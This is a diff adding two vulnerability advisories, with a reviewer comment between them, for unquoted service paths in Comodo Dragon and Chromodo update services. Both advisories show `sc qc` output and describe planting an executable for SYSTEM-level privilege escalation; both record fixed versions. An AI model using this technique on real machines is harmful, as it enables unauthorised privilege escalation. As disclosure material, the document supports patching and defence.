+# Team: CT-Zer0 (@CRYPTTECH)
+# Website: http://yildirimyunus.com
+# Contact: yunusyildirim@protonmail.com
+# Category: local
+# Vendor Homepage: https://www.comodo.com
+# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
+# Version: Software Version <= 52.15.25.663
+# Tested on: Windows 7 x86/x64
+
+1. Description
+
+Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with
+an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+
+2. Proof of Concept
+
+C:\>sc qc DragonUpdater
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: DragonUpdater
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : COMODO Dragon Update Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local attacker must insert an executable file
+in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+
+Additional notes :
+
+Fixed in version 52.15.25.664
+https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html
+
+Vulnerability Disclosure Timeline:
+=========================
+24/09/2016 - Contact With Vendor
+26/09/2016 - Vendor Response
+03/10/2016 - Release Fixed Version
diff --git a/platforms/windows/local/40473.txt b/platforms/windows/local/40473.txt
new file mode 100755
index 000000000..5e362d619
--- /dev/null
+++ b/platforms/windows/local/40473.txt
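Review bot: The impact statement in the Description ("authorized but non-privileged local user ... elevated privileges") is not supported by the `sc qc` output, which shows only that BINARY_PATH_NAME is unquoted and says nothing about whether `C:\` or `C:\Program Files (x86)\Comodo` grants write access to standard users, which a default Windows 7 install does not. An unquoted path is only a privilege-escalation issue when a non-privileged user can place a file in one of the intermediate directories, so the advisory should record the directory permission check that was performed (or state that write access there is a precondition) so readers can judge real exposure. The same gap exists in 40473.txt in the next hunk, where the path is `C:\Program Files\Comodo\Chromodo\chromodo_updater.exe`. A mitigation line for defenders would also help, e.g. `Workaround: upgrade, or quote the service's binary path and confirm with sc qc that BINARY_PATH_NAME is enclosed in quotes.`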
@@ -0,0 +1,53 @@
+# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
+# Date: 03/10/2016
+# Author: Yunus YILDIRIM (@Th3GundY)
+# Team: CT-Zer0 (@CRYPTTECH)
+# Website: http://yildirimyunus.com
+# Contact: yunusyildirim@protonmail.com
+# Category: local
+# Vendor Homepage: https://www.comodo.com
+# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
+# Version: Software Version <= 52.15.25.664
+# Tested on: Windows 7 x86/x64
+
+1. Description
+
+Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with
+an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+
+2. Proof of Concept
+
+C:\>sc qc ChromodoUpdater
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: ChromodoUpdater
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : COMODO Chromodo Update Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local attacker must insert an executable file
+in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+
+Additional notes :
+
+Fixed in version 52.15.25.665
+https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html
+
+Vulnerability Disclosure Timeline:
+=========================
+03/10/2016 - Contact With Vendor
+03/10/2016 - Vendor Response
+05/10/2016 - Release Fixed Version
